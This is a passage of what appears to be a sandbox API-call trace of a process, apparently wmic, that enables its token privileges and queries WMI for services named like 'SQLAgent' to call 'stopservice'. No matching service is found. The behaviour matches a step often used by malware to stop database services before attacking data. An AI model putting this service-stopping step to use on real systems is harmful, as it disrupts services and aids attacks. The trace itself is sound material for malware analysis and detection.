wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x1dd330*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0275.789] free (_Block=0x79ae40) [0275.789] malloc (_Size=0xc) returned 0x79ae10 [0275.789] lstrlenA (lpString="Not Available") returned 13 [0275.789] malloc (_Size=0x1c) returned 0x79ba28 [0275.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa21d94, cbMultiByte=-1, lpWideCharStr=0x79ba28, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0275.789] free (_Block=0x79ba28) [0275.789] IUnknown:Release (This=0x53aa10) returned 0x0 [0275.789] malloc (_Size=0x24) returned 0x79ba28 [0275.789] malloc (_Size=0xc) returned 0x79ae28 [0275.790] malloc (_Size=0x24) returned 0x79ba58 [0275.790] malloc (_Size=0x38) returned 0x79ba88 [0275.790] malloc (_Size=0x24) returned 0x79bac8 [0275.790] free (_Block=0x79ba58) [0275.790] free (_Block=0x79ba28) [0275.790] free (_Block=0x79b9f8) [0275.790] free (_Block=0x79ae88) [0275.790] free (_Block=0x79ae10) [0275.790] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0275.790] IWbemClassObject:GetMethodQualifierSet (in: This=0x590a90, wszMethod="StopService", ppQualSet=0x1dd864 | out: ppQualSet=0x1dd864*=0x565490) returned 0x0 [0275.790] malloc (_Size=0xc) returned 0x79ae10 [0275.790] IWbemQualifierSet:Get (in: This=0x565490, wszName="Implemented", lFlags=0, pVal=0x1dd84c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x1dd84c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0275.790] free (_Block=0x79ae10) [0275.790] malloc (_Size=0xc) returned 0x79aea0 [0275.790] malloc (_Size=0xc) returned 0x79ae88 [0275.791] IWbemQualifierSet:Get (in: This=0x565490, wszName="Description", lFlags=0, pVal=0x1dd83c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x1dd83c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x0), plFlavor=0x0) returned 0x0 [0275.791] free (_Block=0x79ae88) [0275.791] malloc (_Size=0xc) returned 0x79ae58 [0275.791] IUnknown:Release (This=0x565490) returned 0x0 [0275.791] malloc (_Size=0x38) returned 0x79b9f8 [0275.791] malloc (_Size=0x38) returned 0x79ba38 [0275.791] malloc (_Size=0x24) returned 0x79baf8 [0275.791] malloc (_Size=0xc) returned 0x79ae40 [0275.791] malloc (_Size=0x38) returned 0x79bb28 [0275.792] malloc (_Size=0x38) returned 0x79bb68 [0275.792] malloc (_Size=0x24) returned 0x79bba8 [0275.792] malloc (_Size=0x28) returned 0x79bbd8 [0275.792] malloc (_Size=0x38) returned 0x79bc08 [0275.792] malloc (_Size=0x38) returned 0x79bc48 [0275.792] malloc (_Size=0x24) returned 0x79bc88 [0275.792] free (_Block=0x79bba8) [0275.792] free (_Block=0x79bb68) [0275.792] free (_Block=0x79bb28) [0275.792] free (_Block=0x79baf8) [0275.792] free (_Block=0x79ba38) [0275.792] free (_Block=0x79b9f8) [0275.792] IUnknown:Release (This=0x590c88) returned 0x0 [0275.792] free (_Block=0x79bac8) [0275.792] free (_Block=0x79ba88) [0275.792] free (_Block=0x79b9b8) [0275.792] IWbemClassObject:NextMethod (in: This=0x590a90, lFlags=0, pstrName=0x1dd908*=0x0, ppInSignature=0x1dd904*=0x0, ppOutSignature=0x1dd900*=0x0 | out: pstrName=0x1dd908*="PauseService", ppInSignature=0x1dd904*=0x0, ppOutSignature=0x1dd900*=0x567390) returned 0x0 [0275.793] lstrlenW (lpString="PauseService") returned 12 [0275.793] lstrlenW (lpString="stopservice") returned 11 [0275.793] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0275.793] IUnknown:Release (This=0x567390) returned 0x0 [0275.793] IWbemClassObject:NextMethod (in: This=0x590a90, lFlags=0, pstrName=0x1dd908*=0x0, ppInSignature=0x1dd904*=0x0, ppOutSignature=0x1dd900*=0x0 | out: pstrName=0x1dd908*="ResumeService", ppInSignature=0x1dd904*=0x0, ppOutSignature=0x1dd900*=0x567390) returned 0x0 [0275.793] lstrlenW (lpString="ResumeService") returned 13 [0275.793] lstrlenW (lpString="stopservice") returned 11 [0275.793] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0275.793] IUnknown:Release (This=0x567390) returned 0x0 [0275.793] IWbemClassObject:NextMethod (in: This=0x590a90, lFlags=0, pstrName=0x1dd908*=0x0, ppInSignature=0x1dd904*=0x0, ppOutSignature=0x1dd900*=0x0 | out: pstrName=0x1dd908*="InterrogateService", ppInSignature=0x1dd904*=0x0, ppOutSignature=0x1dd900*=0x567390) returned 0x0 [0275.793] lstrlenW (lpString="InterrogateService") returned 18 [0275.793] lstrlenW (lpString="stopservice") returned 11 [0275.793] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0275.793] IUnknown:Release (This=0x567390) returned 0x0 [0275.793] IWbemClassObject:NextMethod (in: This=0x590a90, lFlags=0, pstrName=0x1dd908*=0x0, ppInSignature=0x1dd904*=0x0, ppOutSignature=0x1dd900*=0x0 | out: pstrName=0x1dd908*="UserControlService", ppInSignature=0x1dd904*=0x590c88, ppOutSignature=0x1dd900*=0x5935b8) returned 0x0 [0275.793] lstrlenW (lpString="UserControlService") returned 18 [0275.793] lstrlenW (lpString="stopservice") returned 11 [0275.793] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0275.793] IUnknown:Release (This=0x590c88) returned 0x0 [0275.793] IUnknown:Release (This=0x5935b8) returned 0x0 [0275.793] IWbemClassObject:NextMethod (in: This=0x590a90, lFlags=0, pstrName=0x1dd908*=0x0, ppInSignature=0x1dd904*=0x0, ppOutSignature=0x1dd900*=0x0 | out: pstrName=0x1dd908*="Create", ppInSignature=0x1dd904*=0x590c88, ppOutSignature=0x1dd900*=0x595710) returned 0x0 [0275.794] lstrlenW (lpString="Create") returned 6 [0275.794] lstrlenW (lpString="stopservice") returned 11 [0275.794] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0275.794] IUnknown:Release (This=0x590c88) returned 0x0 [0275.794] IUnknown:Release (This=0x595710) returned 0x0 [0275.794] IWbemClassObject:NextMethod (in: This=0x590a90, lFlags=0, pstrName=0x1dd908*=0x0, ppInSignature=0x1dd904*=0x0, ppOutSignature=0x1dd900*=0x0 | out: pstrName=0x1dd908*="Change", ppInSignature=0x1dd904*=0x590c88, ppOutSignature=0x1dd900*=0x595490) returned 0x0 [0275.794] lstrlenW (lpString="Change") returned 6 [0275.794] lstrlenW (lpString="stopservice") returned 11 [0275.794] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0275.794] IUnknown:Release (This=0x590c88) returned 0x0 [0275.794] IUnknown:Release (This=0x595490) returned 0x0 [0275.794] IWbemClassObject:NextMethod (in: This=0x590a90, lFlags=0, pstrName=0x1dd908*=0x0, ppInSignature=0x1dd904*=0x0, ppOutSignature=0x1dd900*=0x0 | out: pstrName=0x1dd908*="ChangeStartMode", ppInSignature=0x1dd904*=0x590c88, ppOutSignature=0x1dd900*=0x593740) returned 0x0 [0275.794] lstrlenW (lpString="ChangeStartMode") returned 15 [0275.794] lstrlenW (lpString="stopservice") returned 11 [0275.795] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0275.795] IUnknown:Release (This=0x590c88) returned 0x0 [0275.795] IUnknown:Release (This=0x593740) returned 0x0 [0275.795] IWbemClassObject:NextMethod (in: This=0x590a90, lFlags=0, pstrName=0x1dd908*=0x0, ppInSignature=0x1dd904*=0x0, ppOutSignature=0x1dd900*=0x0 | out: pstrName=0x1dd908*="Delete", ppInSignature=0x1dd904*=0x0, ppOutSignature=0x1dd900*=0x567390) returned 0x0 [0275.795] lstrlenW (lpString="Delete") returned 6 [0275.795] lstrlenW (lpString="stopservice") returned 11 [0275.795] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0275.795] IUnknown:Release (This=0x567390) returned 0x0 [0275.795] IWbemClassObject:NextMethod (in: This=0x590a90, lFlags=0, pstrName=0x1dd908*=0x0, ppInSignature=0x1dd904*=0x0, ppOutSignature=0x1dd900*=0x0 | out: pstrName=0x1dd908*="GetSecurityDescriptor", ppInSignature=0x1dd904*=0x0, ppOutSignature=0x1dd900*=0x590c88) returned 0x0 [0275.795] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0275.795] lstrlenW (lpString="stopservice") returned 11 [0275.795] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0275.795] IUnknown:Release (This=0x590c88) returned 0x0 [0275.795] IWbemClassObject:NextMethod (in: This=0x590a90, lFlags=0, pstrName=0x1dd908*=0x0, ppInSignature=0x1dd904*=0x0, ppOutSignature=0x1dd900*=0x0 | out: pstrName=0x1dd908*="SetSecurityDescriptor", ppInSignature=0x1dd904*=0x590c88, ppOutSignature=0x1dd900*=0x5935b8) returned 0x0 [0275.795] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0275.795] lstrlenW (lpString="stopservice") returned 11 [0275.795] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0275.795] IUnknown:Release (This=0x590c88) returned 0x0 [0275.795] IUnknown:Release (This=0x5935b8) returned 0x0 [0275.796] IWbemClassObject:NextMethod (in: This=0x590a90, lFlags=0, pstrName=0x1dd908*=0x0, ppInSignature=0x1dd904*=0x0, ppOutSignature=0x1dd900*=0x0 | out: pstrName=0x1dd908*=0x0, ppInSignature=0x1dd904*=0x0, ppOutSignature=0x1dd900*=0x0) returned 0x40005 [0275.796] IUnknown:Release (This=0x590a90) returned 0x0 [0275.796] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0275.796] lstrlenW (lpString="SET") returned 3 [0275.796] lstrlenW (lpString="call") returned 4 [0275.796] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0275.796] lstrlenW (lpString="CREATE") returned 6 [0275.796] lstrlenW (lpString="call") returned 4 [0275.796] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0275.796] free (_Block=0x792ae0) [0275.796] malloc (_Size=0x4) returned 0x792ee8 [0275.796] lstrlenW (lpString="GET") returned 3 [0275.796] lstrlenW (lpString="call") returned 4 [0275.796] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0275.796] lstrlenW (lpString="LIST") returned 4 [0275.796] lstrlenW (lpString="call") returned 4 [0275.796] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0275.796] lstrlenW (lpString="ASSOC") returned 5 [0275.796] lstrlenW (lpString="call") returned 4 [0275.796] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0275.796] WbemLocator:IUnknown:AddRef (This=0x5348d0) returned 0x3 [0275.796] free (_Block=0x792788) [0275.796] lstrlenW (lpString="") returned 0 [0275.796] lstrlenW (lpString="NQDPDE") returned 6 [0275.796] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0275.796] lstrlenW (lpString="NQDPDE") returned 6 [0275.796] malloc (_Size=0xe) returned 0x79ae70 [0275.796] lstrlenW (lpString="NQDPDE") returned 6 [0275.796] GetCurrentThreadId () returned 0x1228 [0275.796] GetCurrentProcess () returned 0xffffffff [0275.796] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x1df9e0 | out: TokenHandle=0x1df9e0*=0x2f8) returned 1 [0275.797] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1df9dc | out: TokenInformation=0x0, ReturnLength=0x1df9dc) returned 0 [0275.797] malloc (_Size=0x118) returned 0x79b9b8 [0275.797] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x79b9b8, TokenInformationLength=0x118, ReturnLength=0x1df9dc | out: TokenInformation=0x79b9b8, ReturnLength=0x1df9dc) returned 1 [0275.797] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x79b9b8*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0275.797] free (_Block=0x79b9b8) [0275.797] CloseHandle (hObject=0x2f8) returned 1 [0275.797] lstrlenW (lpString="GET") returned 3 [0275.797] lstrlenW (lpString="call") returned 4 [0275.797] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0275.797] lstrlenW (lpString="LIST") returned 4 [0275.797] lstrlenW (lpString="call") returned 4 [0275.797] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0275.797] lstrlenW (lpString="SET") returned 3 [0275.797] lstrlenW (lpString="call") returned 4 [0275.797] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0275.797] lstrlenW (lpString="CALL") returned 4 [0275.797] lstrlenW (lpString="call") returned 4 [0275.797] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0275.797] ??0CHString@@QAE@XZ () returned 0x1df9a0 [0275.797] GetCurrentThreadId () returned 0x1228 [0275.797] malloc (_Size=0xc) returned 0x79aed0 [0275.797] malloc (_Size=0xc) returned 0x79aeb8 [0275.797] malloc (_Size=0xc) returned 0x79ae88 [0275.798] malloc (_Size=0xc) returned 0x79ae10 [0275.798] malloc (_Size=0xc) returned 0x799940 [0275.798] SysStringLen (param_1="\\\\") returned 0x2 [0275.798] SysStringLen (param_1="NQDPDE") returned 0x6 [0275.798] malloc (_Size=0xc) returned 0x79bfd0 [0275.798] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0275.798] SysStringLen (param_1="\\") returned 0x1 [0275.798] malloc (_Size=0xc) returned 0x79be08 [0275.798] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0275.798] SysStringLen (param_1="root\\cimv2") returned 0xa [0275.798] free (_Block=0x79bfd0) [0275.798] free (_Block=0x799940) [0275.798] free (_Block=0x79ae10) [0275.798] free (_Block=0x79ae88) [0275.798] free (_Block=0x79aeb8) [0275.798] free (_Block=0x79aed0) [0275.798] malloc (_Size=0xc) returned 0x79bd60 [0275.798] malloc (_Size=0xc) returned 0x79beb0 [0275.798] malloc (_Size=0xc) returned 0x79be20 [0275.799] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5348d0, strNetworkResource="\\\\NQDPDE\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68564 | out: ppNamespace=0xa68564*=0x590f38) returned 0x0 [0275.807] free (_Block=0x79be20) [0275.807] free (_Block=0x79beb0) [0275.807] free (_Block=0x79bd60) [0275.807] CoSetProxyBlanket (pProxy=0x590f38, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0275.808] free (_Block=0x79be08) [0275.808] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0275.808] ??0CHString@@QAE@XZ () returned 0x1df998 [0275.808] GetCurrentThreadId () returned 0x1228 [0275.808] malloc (_Size=0x38) returned 0x79b9b8 [0275.808] malloc (_Size=0x28) returned 0x79b9f8 [0275.808] malloc (_Size=0x28) returned 0x79ba28 [0275.808] malloc (_Size=0x38) returned 0x79ba58 [0275.808] malloc (_Size=0x38) returned 0x79ba98 [0275.808] malloc (_Size=0x24) returned 0x79bad8 [0275.808] malloc (_Size=0xc) returned 0x79ae88 [0275.808] lstrlenA (lpString="") returned 0 [0275.808] malloc (_Size=0x2) returned 0x792788 [0275.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x792788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0275.808] free (_Block=0x792788) [0275.808] malloc (_Size=0x38) returned 0x79bb08 [0275.808] malloc (_Size=0x24) returned 0x79bb48 [0275.809] malloc (_Size=0xc) returned 0x79aeb8 [0275.809] free (_Block=0x79ae88) [0275.809] IWbemServices:GetObject (in: This=0x590f38, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x1df970*=0x0, ppCallResult=0x0 | out: ppObject=0x1df970*=0x590a90, ppCallResult=0x0) returned 0x0 [0275.868] malloc (_Size=0xc) returned 0x79ae88 [0275.868] IWbemClassObject:GetMethod (in: This=0x590a90, wszName="stopservice", lFlags=0, ppInSignature=0x1df98c, ppOutSignature=0x1df96c | out: ppInSignature=0x1df98c*=0x0, ppOutSignature=0x1df96c*=0x590c88) returned 0x0 [0275.868] free (_Block=0x79ae88) [0275.868] IUnknown:Release (This=0x590c88) returned 0x0 [0275.868] IUnknown:Release (This=0x590a90) returned 0x0 [0275.868] ??0CHString@@QAE@XZ () returned 0x1df850 [0275.869] GetCurrentThreadId () returned 0x1228 [0275.869] malloc (_Size=0xc) returned 0x79ae88 [0275.869] lstrlenA (lpString="") returned 0 [0275.869] malloc (_Size=0x2) returned 0x792788 [0275.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x792788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0275.869] free (_Block=0x792788) [0275.869] malloc (_Size=0xc) returned 0x79aed0 [0275.869] lstrlenA (lpString="") returned 0 [0275.869] malloc (_Size=0x2) returned 0x792788 [0275.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x792788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0275.869] free (_Block=0x792788) [0275.869] malloc (_Size=0xc) returned 0x79ae10 [0275.869] free (_Block=0x79aed0) [0275.869] malloc (_Size=0xc) returned 0x79aed0 [0275.869] lstrlenA (lpString="SELECT * FROM ") returned 14 [0275.869] malloc (_Size=0x1e) returned 0x79bb78 [0275.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa24354, cbMultiByte=-1, lpWideCharStr=0x79bb78, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0275.869] free (_Block=0x79bb78) [0275.869] malloc (_Size=0xc) returned 0x799940 [0275.869] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0275.869] SysStringLen (param_1="Win32_Service") returned 0xd [0275.870] free (_Block=0x79aed0) [0275.870] malloc (_Size=0xc) returned 0x79aed0 [0275.870] malloc (_Size=0xc) returned 0x79bef8 [0275.870] lstrlenA (lpString=" WHERE ") returned 7 [0275.870] malloc (_Size=0x10) returned 0x79bd18 [0275.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa237a8, cbMultiByte=-1, lpWideCharStr=0x79bd18, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0275.870] free (_Block=0x79bd18) [0275.870] malloc (_Size=0xc) returned 0x79bce8 [0275.870] SysStringLen (param_1=" WHERE ") returned 0x7 [0275.870] SysStringLen (param_1="name like '%%SQLAgent%%'") returned 0x18 [0275.870] malloc (_Size=0xc) returned 0x79bf58 [0275.870] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0275.870] SysStringLen (param_1=" WHERE name like '%%SQLAgent%%'") returned 0x1f [0275.870] free (_Block=0x799940) [0275.870] free (_Block=0x79bce8) [0275.870] free (_Block=0x79bef8) [0275.870] free (_Block=0x79aed0) [0275.871] malloc (_Size=0xc) returned 0x79bd18 [0275.871] IWbemServices:ExecQuery (in: This=0x590f38, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%SQLAgent%%'", lFlags=48, pCtx=0x0, ppEnum=0x1df85c | out: ppEnum=0x1df85c*=0x594878) returned 0x0 [0275.892] free (_Block=0x79bd18) [0275.893] CoSetProxyBlanket (pProxy=0x594878, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0275.896] IEnumWbemClassObject:Next (in: This=0x594878, lTimeout=-1, uCount=0x1, apObjects=0x1df858, puReturned=0x1df848 | out: apObjects=0x1df858*=0x0, puReturned=0x1df848*=0x0) returned 0x1 [0277.154] IUnknown:Release (This=0x594878) returned 0x0 [0277.163] free (_Block=0x79bf58) [0277.163] free (_Block=0x79ae10) [0277.163] free (_Block=0x79ae88) [0277.163] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0277.163] free (_Block=0x79aeb8) [0277.163] free (_Block=0x79bad8) [0277.163] free (_Block=0x79ba98) [0277.163] free (_Block=0x79ba58) [0277.163] free (_Block=0x79ba28) [0277.163] free (_Block=0x79b9f8) [0277.163] free (_Block=0x79bb48) [0277.163] free (_Block=0x79bb08) [0277.163] free (_Block=0x79b9b8) [0277.163] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0277.164] GetCurrentThreadId () returned 0x1228 [0277.164] ??0CHString@@QAE@PBG@Z () returned 0x1dfa10 [0277.164] ??YCHString@@QAEABV0@PBG@Z () returned 0x1dfa10 [0277.164] malloc (_Size=0x800) returned 0x79c0c0 [0277.164] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x79c0c0, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0277.164] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0277.165] malloc (_Size=0x1c) returned 0x79b9b8 [0277.165] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x79b9b8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0277.165] __iob_func () returned 0x776f2608 [0277.165] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 27 [0277.165] __iob_func () returned 0x776f2608 [0277.165] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0277.166] free (_Block=0x79b9b8) [0277.166] free (_Block=0x79c0c0) [0277.166] ??1CHString@@QAE@XZ () returned 0x1 [0277.166] WbemLocator:IUnknown:Release (This=0x590f38) returned 0x0 [0277.170] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0277.170] _kbhit () returned 0x0 [0277.174] free (_Block=0x792ee8) [0277.174] free (_Block=0x79ad50) [0277.174] free (_Block=0x79aca8) [0277.174] free (_Block=0x79aba0) [0277.174] free (_Block=0x79ad68) [0277.174] free (_Block=0x79b058) [0277.174] free (_Block=0x79b188) [0277.174] free (_Block=0x799da8) [0277.174] free (_Block=0x79b208) [0277.174] free (_Block=0x79abb8) [0277.174] free (_Block=0x792b00) [0277.174] free (_Block=0x790520) [0277.175] free (_Block=0x79bc88) [0277.175] free (_Block=0x79ac00) [0277.175] free (_Block=0x79ae28) [0277.175] free (_Block=0x79bc48) [0277.175] free (_Block=0x79bc08) [0277.175] free (_Block=0x79aea0) [0277.175] free (_Block=0x79ae58) [0277.175] free (_Block=0x79ae40) [0277.175] free (_Block=0x79bbd8) [0277.175] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0277.175] free (_Block=0x79b0f0) [0277.175] free (_Block=0x79ad80) [0277.175] free (_Block=0x790568) [0277.175] free (_Block=0x79abe8) [0277.175] free (_Block=0x79b1c8) [0277.175] free (_Block=0x79ac18) [0277.175] free (_Block=0x792c00) [0277.175] free (_Block=0x7926b0) [0277.175] free (_Block=0x7926f8) [0277.175] free (_Block=0x792740) [0277.175] free (_Block=0x79ae70) [0277.176] free (_Block=0x7927c8) [0277.176] free (_Block=0x790508) [0277.176] free (_Block=0x792ce0) [0277.176] free (_Block=0x7904f0) [0277.176] free (_Block=0x792c20) [0277.176] free (_Block=0x7904d8) [0277.176] free (_Block=0x7929c0) [0277.176] free (_Block=0x792908) [0277.176] free (_Block=0x792920) [0277.176] free (_Block=0x7928d0) [0277.176] free (_Block=0x7928e8) [0277.176] free (_Block=0x792940) [0277.176] free (_Block=0x792958) [0277.176] free (_Block=0x7904a0) [0277.176] free (_Block=0x7904b8) [0277.176] free (_Block=0x792860) [0277.176] free (_Block=0x792878) [0277.176] free (_Block=0x792828) [0277.176] free (_Block=0x792840) [0277.176] free (_Block=0x792898) [0277.177] free (_Block=0x7928b0) [0277.177] free (_Block=0x7927f0) [0277.177] free (_Block=0x792808) [0277.177] free (_Block=0x7927a0) [0277.177] free (_Block=0x791200) [0277.177] free (_Block=0x79afd0) [0277.177] 